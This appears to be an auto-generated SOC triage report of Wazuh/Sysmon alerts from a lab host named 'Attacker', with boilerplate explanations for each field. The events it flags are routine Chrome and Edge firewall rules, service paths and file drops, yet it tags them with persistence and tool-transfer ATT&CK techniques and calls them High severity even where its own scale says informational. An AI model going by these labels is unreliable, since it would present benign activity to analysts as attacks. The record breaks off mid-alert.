Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{34C7F7EC-FD01-4B0C-9AE2-0AC035634095} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|

🧠 What happened? Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{34C7F7EC-FD01-4B0C-9AE2-0AC035634095} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:34:21.815+0000 | 🧠 MITRE: ['Persistence', 'Privilege Escalation'] – ['Windows Service'] [T1543.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1543.003

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:21.815+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{34C7F7EC-FD01-4B0C-9AE2-0AC035634095} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92307
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1543.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Persistence', 'Privilege Escalation']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Windows Service']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid13_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534061.605893
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  13
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  13
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:41:13.3543878Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  225936
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Registry value set: RuleName: - EventType: SetValue UtcTime: 2025-04-20 01:41:13.351 ProcessGuid: {94294ddc-ea86-67fe-3b00-000000000e00} ProcessId: 2892 Image: C:\WINDOWS\system32\svchost.exe TargetObject: HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{34C7F7EC-FD01-4B0C-9AE2-0AC035634095} Details: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Program Files\Google\Chrome\Application\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome| User: NT AUTHORITY\LOCAL SERVICE"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.eventType:  SetValue
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:41:13.351
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-ea86-67fe-3b00-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2892
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetObject:  HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{34C7F7EC-FD01-4B0C-9AE2-0AC035634095}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.details:  v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\LOCAL SERVICE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath binary is: \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.96\\elevation_service.exe\"

🧠 What happened? Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath binary is: \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.96\\elevation_service.exe\"

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:34:21.863+0000 | 🧠 MITRE: ['Persistence', 'Privilege Escalation'] – ['Windows Service'] [T1543.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1543.003

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:21.863+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath binary is: \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.96\\elevation_service.exe\"
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92307
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1543.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Persistence', 'Privilege Escalation']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Windows Service']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid13_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534061.610121
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  13
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  13
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:41:13.3671970Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  225940
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Registry value set: RuleName: - EventType: SetValue UtcTime: 2025-04-20 01:41:13.364 ProcessGuid: {94294ddc-ea7f-67fe-0b00-000000000e00} ProcessId: 772 Image: C:\WINDOWS\system32\services.exe TargetObject: HKLM\System\CurrentControlSet\Services\GoogleChromeElevationService\ImagePath Details: "C:\Program Files\Google\Chrome\Application\135.0.7049.96\elevation_service.exe" User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.eventType:  SetValue
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:41:13.364
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-ea7f-67fe-0b00-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetObject:  HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.details:  \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.96\\elevation_service.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:34:22.299+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:22.299+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534062.613301
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:41:13.6190305Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  225972
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:41:13.600 ProcessGuid: {94294ddc-50b9-6804-bf08-000000000e00} ProcessId: 10860 Image: C:\WINDOWS\SystemTemp\chrome_Unpacker_BeginUnzipping12284_132767381\CR_72F4F.tmp\setup.exe TargetFilename: C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk CreationUtcTime: 2025-04-12 15:52:55.107 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:41:13.600
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-50b9-6804-bf08-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10860
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\SystemTemp\\chrome_Unpacker_BeginUnzipping12284_132767381\\CR_72F4F.tmp\\setup.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\System32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-12 15:52:55.107
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{F4DF00BD-4AEA-44E9-91CE-FDCCFF1F019F} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe|Name=025e84dc-434c-4cde-a1c0-1932db2c81a4|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge|

🧠 What happened? Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{F4DF00BD-4AEA-44E9-91CE-FDCCFF1F019F} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe|Name=025e84dc-434c-4cde-a1c0-1932db2c81a4|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge|

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:34:27.311+0000 | 🧠 MITRE: ['Persistence', 'Privilege Escalation'] – ['Windows Service'] [T1543.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1543.003

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:27.311+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{F4DF00BD-4AEA-44E9-91CE-FDCCFF1F019F} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe|Name=025e84dc-434c-4cde-a1c0-1932db2c81a4|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge|
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92307
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1543.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Persistence', 'Privilege Escalation']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Windows Service']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid13_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534067.616369
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  13
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  13
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:41:49.4998048Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  227426
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Registry value set: RuleName: - EventType: SetValue UtcTime: 2025-04-20 01:41:49.499 ProcessGuid: {94294ddc-ea86-67fe-3b00-000000000e00} ProcessId: 2892 Image: C:\WINDOWS\system32\svchost.exe TargetObject: HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{F4DF00BD-4AEA-44E9-91CE-FDCCFF1F019F} Details: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe|Name=025e84dc-434c-4cde-a1c0-1932db2c81a4|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge| User: NT AUTHORITY\LOCAL SERVICE"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.eventType:  SetValue
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:41:49.499
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-ea86-67fe-3b00-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2892
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetObject:  HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{F4DF00BD-4AEA-44E9-91CE-FDCCFF1F019F}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.details:  v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe|Name=025e84dc-434c-4cde-a1c0-1932db2c81a4|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge|
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\LOCAL SERVICE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:34:28.508+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:28.508+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534068.620707
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:42:01.5524130Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  228128
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:42:01.551 ProcessGuid: {94294ddc-50a4-6804-a108-000000000e00} ProcessId: 11932 Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\chrome_Unpacker_BeginUnzipping11932_114863717\manifest.json CreationUtcTime: 2025-04-20 01:42:01.551 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:42:01.551
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-50a4-6804-a108-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11932
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

